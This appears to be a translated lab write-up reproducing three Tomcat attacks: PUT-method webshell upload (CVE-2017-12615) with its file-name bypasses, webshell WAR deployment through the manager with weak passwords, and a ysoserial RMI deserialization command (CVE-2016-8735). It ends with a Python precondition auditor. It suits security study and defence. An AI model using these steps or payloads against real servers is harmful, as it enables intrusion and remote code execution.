Tomcat middleware vulnerability reproduction
Foreword
In penetration tests I have come across relatively few PHP sites, so I know too little about Apache, and even less about sites running on Tomcat middleware. This is my first time building a vulnerability test environment, so I fell into more pitfalls than most along the way. I am writing down the pitfalls I hit in the hope that it helps everyone.
Test environment to build
Tomcat installation (installed under Windows)
Java environment installation
JDK installation
Download the installation package from the JDK official website: https://www.oracle.com/technetwork/java/javase/downloads/index.html
Install it following the prompts, then configure the environment variables (JAVA_HOME, and the JDK bin directory on PATH). When successful it looks as shown:
Apache Tomcat 7.0 installation
Download: http://www.liangchan.net/soft/download.asp?softid=9366&downid=8&id=9430
Click Next all the way through with the default settings.
One step needs attention: the directory asked for here is the JRE directory of the Java installation; if it is wrong, the installation does not work. Once installed, open http://localhost:8080 directly; it is shown below:
Vulnerability reproduction
Tomcat remote code execution vulnerability (CVE-2017-12615)
Cause
The vulnerability arises when the readonly init-param of the DefaultServlet in conf/web.xml (Tomcat's configuration directory) is set to false, which makes the server honour PUT requests.
Compare the configuration file before and after the change (this needs attention). Before the change:
readonly defaults to true. When it is set to false, files can be created and removed through PUT/DELETE. readonly must be set to false by hand before the vulnerability is exploitable. After the change:
Save the configuration file after editing it and restart Tomcat.
PUT method: PUT is one of the HTTP request methods. It asks the server to store the request body at the location named by the request URI. If the resource already exists on the server, the data in the request replaces it as the newest version of that resource; if it does not exist, the resource is created with the request body as its content.
Affected versions
Apache Tomcat 7.0.0 – 7.0.79, on Windows (the file-name tricks below rely on Windows file-system behaviour). The follow-up CVE-2017-12617 covers the same PUT problem on all platforms and extends the affected range to 7.0.81, 8.0.46, 8.5.22 and 9.0.0.
Impact
Remote code execution on the server.
Vulnerability reproduction
Open http://127.0.0.1:8088/ directly and capture the request with Burp Suite. Submitting shell.jsp with a plain PUT returns 404. (I made a silly comparison here.)
Comparison figure, before the modification (normal):
Figure after the modification (in the captured request, change GET to PUT directly):
The file name has to be constructed so that it gets past the JSP servlet mapping and reaches the DefaultServlet. There are three ways to bypass it: a trailing slash (shell.jsp/), a trailing URL-encoded space (shell.jsp%20), and the NTFS alternate data stream suffix (shell.jsp::$DATA):
Upload comparison chart (the wrong one on the side wasted a lot of time; at first I could not find the reason):
Upload successful, as shown (the method must be written in upper case, PUT; I kept wondering why it did not work):
View:
The webshell has been written successfully; connect to it with China Chopper.
Tomcat manager remote deployment vulnerability
Cause
The Tomcat manager application lets an administrator deploy a site remotely: upload a file in WAR format and it is published to the site. This is convenient for developers deploying code, but it equally opens the door for an attacker to upload a webshell.
Detection
Visit the management address http://localhost:port/manager and try weak or default passwords. If you can log in, the vulnerability exists.
Vulnerability reproduction
- Log in to the management interface with the weak password
- Upload the WAR package
- Access it directly to get a shell
Impact
An intruder can upload a webshell packed as a WAR and take control of the server.
Fix
Upgrade Tomcat, use strong, non-default credentials in conf/tomcat-users.xml, restrict access to the manager by source address (or remove the manager application if it is not needed), and install appropriate protection software.
Tomcat deserialization vulnerability (CVE-2016-8735)
Test environment build (not successful)
Apache Tomcat 8.5.2 installation
Tomcat download: http://tomcat.apache.org/
Install the 8.5.2 release (under the Tomcat 8 line)
Find the version you need in the archive
Click bin
Find the downloadable package
Download it and extract it locally (no installer needed).
Then run Tomcat. The first way is to set the environment variables and run the startup.bat batch file from cmd; I used the second way: open a cmd window in \apache-tomcat-8.5.2\bin and run startup.bat. As the picture shows:
It errors out because the JDK environment variable (JAVA_HOME) is not set.
Solution (I found the cause and the fix online; this post explains them very clearly):
https://blog.csdn.net/zhangchao19890805/article/details/50646644
If the port conflicts, change the HTTP connector port in conf/server.xml (around line 69). As the picture shows:
Once everything is ready, run startup.bat from the cmd window. A window running Tomcat pops up as shown; do not close it. Then open it directly in the browser.
Service started successfully.
JDK 1.7.0_80 installation (mentioned before)
Vulnerability description
This vulnerability is related to the JMX RMI deserialization vulnerability Oracle published earlier (CVE-2016-3427); it is caused by the JmxRemoteLifecycleListener monitoring feature. Oracle released a fix on the JRE side, but Tomcat's listener was not updated for consistency with that patch, so remote code execution remained possible.
The root cause is the way Tomcat's JmxRemoteLifecycleListener sets up JMX monitoring.
Affected versions
Apache Tomcat 9.0.0.M1 to 9.0.0.M11
Apache Tomcat 8.5.0 to 8.5.6
Apache Tomcat 8.0.0.RC1 to 8.0.38
Apache Tomcat 7.0.0 to 7.0.72
Apache Tomcat 6.0.0 to 6.0.47
Exploit conditions
JmxRemoteLifecycleListener must be enabled with its RMI registry and RMI server ports reachable from the attacker (this write-up speaks of 10001 and 10002 here, but the server.xml below configures 1001 and 1002; the exploit has to target whatever rmiRegistryPortPlatform is actually set to), and JMX authentication must be disabled. The attack deserializes a gadget chain inside the RMI registry, so the target JVM matters too: JDK updates that ship JEP 290 serialization filtering (8u121 / 7u131 and later) filter what the registry deserializes, which is why an old JDK such as 1.7.0_80 is used here.
Vulnerability reproduction
Required environment and toolkit:
catalina-jmx-remote.jar:
https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.2/bin/extras/catalina-jmx-remote.jar
groovy-2.3.9.jar:
http://central.maven.org/maven2/org/codehaus/groovy/groovy/2.3.9/groovy-2.3.9.jar
ysoserial.jar:
https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
Before reproducing the vulnerability, configure the following:
Around line 30 of conf/server.xml, enable the JmxRemoteLifecycleListener and its listening ports (add it by hand; be careful to avoid port conflicts):
<Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener" rmiRegistryPortPlatform="1001" rmiServerPortPlatform="1002"/>
After configuring the JMX ports, download catalina-jmx-remote.jar from the extras/ directory matching our Tomcat version, and download groovy-2.3.9.jar; once downloaded, put both jars in the lib directory. (The Groovy1 gadget chain used below needs Groovy on Tomcat's classpath, which is what the second jar is for.)
Then edit the catalina.bat script in the bin directory. Add the following line before the "Execute The Requested Command" comment (added by hand; note the space):
set CATALINA_OPTS= -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false
These options make Tomcat start JMX remote monitoring of the JVM with the SSL link disabled and no account required for authentication, so anyone who can reach the RMI ports can connect to the MBean server. For the details, look into how Tomcat's JMX monitoring is configured.
Once all the configuration is saved, start Tomcat.
Check whether the local service is listening on RMI ports 1001 and 1002 to confirm it started successfully.
Listening is up, so we start constructing the payload to execute a command. First the old routine: pop a calculator.
Payload: java -cp ysoserial-master-v0.0.4.jar ysoserial.exploit.RMIRegistryExploit localhost 10001 Groovy1 calc.exe
(The jar name must match the ysoserial build you actually downloaded, and the port must be the rmiRegistryPortPlatform from server.xml; with the listener configured above that is 1001, not 10001.)
The calculator did not pop for me (the screenshot is someone else's, but the steps are right; if the previous steps are correct it does pop). The reason may be my Java environment.
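Added example, not from the original write-up: a Python audit of the CVE-2016-8735 preconditions described above. It reads the JmxRemoteLifecycleListener ports out of server.xml, checks whether CATALINA_OPTS disables JMX SSL and authentication (a hardened variant sits beside the weak one), optionally probes the registry port, and builds the ysoserial command from the port that is actually configured, which avoids the 1001/10001 mismatch in the notes above. The server.xml fragment and the CATALINA_OPTS lines are constructed samples mirroring the write-up; the host and the jar name are assumptions.

```python
"""Added example (not from the original write-up): audit a Tomcat install for
the CVE-2016-8735 preconditions: JmxRemoteLifecycleListener in server.xml, JMX
remote started without SSL/authentication, and the registry port reachable.
server.xml and CATALINA_OPTS below are constructed samples."""
import re
import socket
import xml.etree.ElementTree as ET

# Constructed conf/server.xml fragment carrying the listener line from the write-up.
SERVER_XML = """<?xml version="1.0" encoding="UTF-8"?>
<Server port="8005" shutdown="SHUTDOWN">
  <Listener className="org.apache.catalina.startup.VersionLoggerListener"/>
  <Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener"
            rmiRegistryPortPlatform="1001" rmiServerPortPlatform="1002"/>
  <Service name="Catalina"><Connector port="8080" protocol="HTTP/1.1"/></Service>
</Server>"""

# The catalina.bat line from the write-up (weak) and a hardened counterpart
# (SSL on, authentication on, password file assumed to exist).
CATALINA_OPTS_WEAK = ("set CATALINA_OPTS= -Dcom.sun.management.jmxremote.ssl=false"
                      " -Dcom.sun.management.jmxremote.authenticate=false")
CATALINA_OPTS_HARDENED = ("set CATALINA_OPTS= -Dcom.sun.management.jmxremote.ssl=true"
                          " -Dcom.sun.management.jmxremote.authenticate=true"
                          " -Dcom.sun.management.jmxremote.password.file=conf/jmxremote.password")


def jmx_listener_ports(server_xml_text):
    """(registry_port, server_port) of JmxRemoteLifecycleListener, or None if absent."""
    root = ET.fromstring(server_xml_text)
    for listener in root.iter("Listener"):
        if listener.get("className", "").endswith("JmxRemoteLifecycleListener"):
            return (int(listener.get("rmiRegistryPortPlatform", -1)),
                    int(listener.get("rmiServerPortPlatform", -1)))
    return None


def jmx_unauthenticated(catalina_opts):
    """True when both jmxremote.ssl and jmxremote.authenticate are set to false."""
    flags = dict(re.findall(r"-Dcom\.sun\.management\.jmxremote\.(\w+)=(\w+)", catalina_opts))
    return flags.get("ssl") == "false" and flags.get("authenticate") == "false"


def port_open(host, port, timeout=2.0):
    """Plain TCP connect; the RMI registry answers on rmiRegistryPortPlatform."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def ysoserial_command(jar, host, registry_port, gadget="Groovy1", cmd="calc.exe"):
    """The RMIRegistryExploit invocation; the port is the registry port from
    server.xml, not a number remembered from notes."""
    return f"java -cp {jar} ysoserial.exploit.RMIRegistryExploit {host} {registry_port} {gadget} {cmd}"


def assess(server_xml_text, catalina_opts, host="127.0.0.1", jar="ysoserial.jar", probe=False):
    """Combine the checks into one verdict plus the command to try."""
    ports = jmx_listener_ports(server_xml_text)
    if ports is None:
        return {"exposed": False, "reason": "no JmxRemoteLifecycleListener configured"}
    registry, server = ports
    unauth = jmx_unauthenticated(catalina_opts)
    result = {"registry_port": registry, "server_port": server,
              "unauthenticated": unauth, "exposed": unauth,
              "command": ysoserial_command(jar, host, registry)}
    if probe:
        result["registry_listening"] = port_open(host, registry)
    return result


if __name__ == "__main__":
    import json
    print(json.dumps(assess(SERVER_XML, CATALINA_OPTS_WEAK, probe=True), indent=2))
    print(json.dumps(assess(SERVER_XML, CATALINA_OPTS_HARDENED), indent=2))
```

Run against a real install, point it at conf/server.xml and the CATALINA_OPTS line from bin/catalina.bat (or setenv.bat); "exposed" true with the registry port listening is the state the reproduction above needs, and the hardened CATALINA_OPTS line is the configuration-level fix short of upgrading Tomcat.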